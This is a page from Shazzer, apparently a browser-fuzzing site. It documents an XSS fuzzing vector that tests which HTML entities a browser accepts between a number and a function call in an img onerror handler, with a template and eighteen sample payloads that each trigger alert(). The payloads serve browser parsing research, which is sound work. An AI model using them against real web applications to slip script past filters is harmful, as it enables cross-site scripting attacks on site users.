Entities allowed between function call and number

This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.

Created byhackvertor

Created Jul 2, 2024

Updated May 27, 2025

Detecting browser...

CategoryEntity Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml_entities

Template used:

<img src=data: onerror="1$[data1]log('html($[data1])')">

Sample payloads

<img src=data: onerror="1&amp;alert('&#38;amp;')">

<img src=data: onerror="1&AMP;alert('&#38;AMP;')">

<img src=data: onerror="1&ast;alert('&#38;ast;')">

<img src=data: onerror="1&comma;alert('&#38;comma;')">

<img src=data: onerror="1&gt;alert('&#38;gt;')">

<img src=data: onerror="1&GT;alert('&#38;GT;')">

<img src=data: onerror="1&Hat;alert('&#38;Hat;')">

<img src=data: onerror="1&lt;alert('&#38;lt;')">

<img src=data: onerror="1&LT;alert('&#38;LT;')">

<img src=data: onerror="1&midast;alert('&#38;midast;')">

<img src=data: onerror="1&NewLine;alert('&#38;NewLine;')">

<img src=data: onerror="1&percnt;alert('&#38;percnt;')">

<img src=data: onerror="1&plus;alert('&#38;plus;')">

<img src=data: onerror="1&semi;alert('&#38;semi;')">

<img src=data: onerror="1&sol;alert('&#38;sol;')">

<img src=data: onerror="1&verbar;alert('&#38;verbar;')">

<img src=data: onerror="1&vert;alert('&#38;vert;')">

<img src=data: onerror="1&VerticalLine;alert('&#38;VerticalLine;')">

Entities allowed between function call and number

Sample payloads

Fuzz results

Distributed Fuzzing